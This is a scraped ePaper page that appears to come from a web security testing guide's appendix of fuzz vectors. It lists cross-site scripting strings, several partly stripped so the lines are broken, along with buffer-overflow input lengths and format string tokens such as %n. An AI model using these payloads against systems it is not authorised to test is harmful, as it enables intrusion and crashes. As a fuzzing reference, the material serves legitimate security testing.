01.09.2015 Views

4.0

1NSchAb

1NSchAb

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

219<br />

Cross Site Scripting (XSS)<br />

For details on XSS: Cross-site Scripting (XSS)<br />

>”>alert(“XSS”)&<br />

“>@import”javascript:alert(‘XSS’)”;<br />

>”’><br />

>%22%27><br />

‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’<br />

“><br />

>”<br />

‘’;!--”=&{()}<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

Buffer Overflows and Format String Errors<br />

Buffer Overflows (BFO)<br />

A buffer overflow or memory corruption attack is a programming<br />

condition which allows overflowing of valid data beyond its prelocated<br />

storage limit in memory.<br />

For details on Buffer Overflows: Testing for Buffer Overflow<br />

Note that attempting to load such a definition file within a fuzzer application<br />

can potentially cause the application to crash.<br />

A x 5<br />

A x 17<br />

A x 33<br />

A x 65<br />

A x 129<br />

A x 257<br />

A x 513<br />

A x 1024<br />

A x 2049<br />

A x 4097<br />

A x 8193<br />

A x 12288<br />

Format String Errors (FSE)<br />

Format string attacks are a class of vulnerabilities that involve supplying<br />

language specific format tokens to execute arbitrary code or<br />

crash a program. Fuzzing for such errors has as an objective to check<br />

for unfiltered user input.<br />

An excellent introduction on FSE can be found in the USENIX paper<br />

entitled: Detecting Format String Vulnerabilities with Type Qualifiers<br />

Note that attempting to load such a definition file within a fuzzer application<br />

can potentially cause the application to crash.<br />

%s%p%x%d<br />

.1024d<br />

%.2049d<br />

%p%p%p%p<br />

%x%x%x%x<br />

%d%d%d%d<br />

%s%s%s%s<br />

%99999999999s<br />

%08x<br />

%%20d<br />

%%20n<br />

%%20x<br />

%%20s<br />

%s%s%s%s%s%s%s%s%s%s<br />

%p%p%p%p%p%p%p%p%p%p<br />

%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%-<br />

j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />

%s x 129

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!